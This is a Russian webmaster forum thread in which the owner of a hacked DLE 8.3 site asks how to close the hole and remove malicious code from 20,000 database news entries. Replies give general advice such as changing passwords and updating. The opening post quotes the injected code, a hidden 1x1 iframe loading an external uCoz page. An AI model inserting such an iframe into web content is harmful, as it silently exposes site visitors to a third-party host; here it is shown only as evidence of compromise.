Как убрать вирус в DLE 8.3?

V
На сайте с 09.06.2009
Offline
103
1508

Добрый день!

Сегодня заметил что мой сайт оказался взломан,(версия движка DLE 8.3):

и во всех новостях обнаружил вот этот странный код:


<iframe src="http://tyt-vse.ucoz.ru/index/0-2" width="1" height="1"></iframe>

С вязи с чем возникает вопрос:

1. Как закрыть данную дырку, через которую взламывают сайт?

2. Как убрать этот зловредный код из MYSQL - вернее какой командой, так как этот код во всех новостях....(А новостей больше 20 тысяч...).

Убедительно прошу, объясните поэтапно, что делать. Хотя примерно я набрасал следующий план действий:

1. Необходимо сменить пароли!

2. Обновить до 9 версии движок (ВОТ ЗДЕСЬ ПОПОДРОБНЕЕ ПОЖАЛУЙСТА, КАК ЭТО СДЕЛАТЬ, А ТО Я НИКОГДА НЕ ОБНОВЛЯЛ ДВИЖОК).

3. Убрать зловредный код из MySql - ВОТ ЗДЕСЬ ТОЖЕ ПОПОДРОБНЕЕ, какой командой отобрать в какой таблице и какой командой удалить эту хрень из базы данных!

Заранее благодарен!

[Удален]
#1

http://forum.dle-news.ru/ тут напиши, помогут, конечно же, если есть лицензия ;) А если нету - то это не наши проблемы ;)

Dkarlov
На сайте с 23.02.2004
Offline
146
#2

Сменить пароли, измените права на запись если в шаблон втыкают + доп авторизация через .htaccess

VPS/Dedicated (https://bill2fast.com/aff.php?aff=2418) с нормальной поддержкой!
V
На сайте с 09.06.2009
Offline
103
#3

Никто не знает?

Значит зря обращался....

Жаль.......

Только умники которые репутацию уменьшили - лучше бы знали как исправить, а то получается, что кроме изменения репутации они ничего больше не умеют и наверное не знают....

Akillon
На сайте с 10.06.2010
Offline
13
#4

Обновить движок, поставить все заплатки, и сделать как я тут писал, если будут вопросы - icq в профиле /ru/forum/comment/8163128

[Удален]
#5

привет - стукни в аську 79-пять пять-666 - подскажу

X
На сайте с 11.12.2010
Offline
4
#6

http://dle-news.ru/bags/ - тут все обнаруженные уязвимости и как их закрыть🍿

Хортица
На сайте с 22.12.2006
Offline
289
#7
xsoulzzz:
тут все

Не все ;) 10 символов

На XBit.Money (https://xbit.money/?rid=111) меняю крипту на гривны. Лучшие курсы Обмен Вашего PayPal/ЯД/QIWI/WebMoney и куча плюшек! Рекомендую (https://exchangex.ru/index.php?who=26749)
iamsens
На сайте с 26.08.2009
Offline
115
#8
volgalab:
Никто не знает?
Значит зря обращался....
Жаль.......
Только умники которые репутацию уменьшили - лучше бы знали как исправить, а то получается, что кроме изменения репутации они ничего больше не умеют и наверное не знают....

как бы ты немного квадртано спросил

"1. Как закрыть данную дырку, через которую взламывают сайт?"

у меня в подвале тоже что-то стучит, не знаешь как пофиксить, твой вопрос звуит примерно так же

с большой долей вероятности подобрали вопрос к фтп или уязвимость в скрипте есть

в любом случае надо детально смотреть и в двух словах тебе никто ответить не сможет

X
На сайте с 11.12.2010
Offline
4
#9
Хортица:
Не все ;) 10 символов

согласен, есть еще много, которых не сдали туда или просто не нашли..

уязвимости базы данных и других частей не относящихся к дле и тд.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий